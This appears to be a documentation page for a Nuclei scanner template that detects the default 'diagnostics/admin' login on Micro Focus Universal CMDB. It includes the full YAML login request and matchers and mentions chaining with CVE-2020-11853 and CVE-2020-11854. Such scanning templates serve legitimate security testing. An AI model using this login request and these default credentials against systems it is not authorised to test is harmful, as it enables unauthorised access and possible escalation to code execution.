Micro Focus Universal CMDB Default Login
ID: ucmdb-default-login
Severity: high
Author: dwisiswant0
Tags: ucmdb,default-login,packetstorm
Description
Section titled “Description”Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
YAML Source
Section titled “YAML Source”id: ucmdb-default-login
info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: cwe-id: CWE-798 metadata: max-request: 1 tags: ucmdb,default-login,packetstorm
http: - raw: - | POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 Host: {{Hostname}}
customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB
attack: pitchfork payloads: username: - diagnostics password: - admin
matchers-condition: and matchers: - type: status status: - 200
- type: word part: header words: - "LWSSO_COOKIE_KEY"# digest: 4a0a00473045022100adffd368f48daa3ac41364685c4ef9cde8bd55e0bb44b993d046047f9010be4102206b257b08dfb19fd49713be5667ca18f361682b562d98cfa96445c6860300c554:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/UCMDB/ucmdb-default-login.yaml"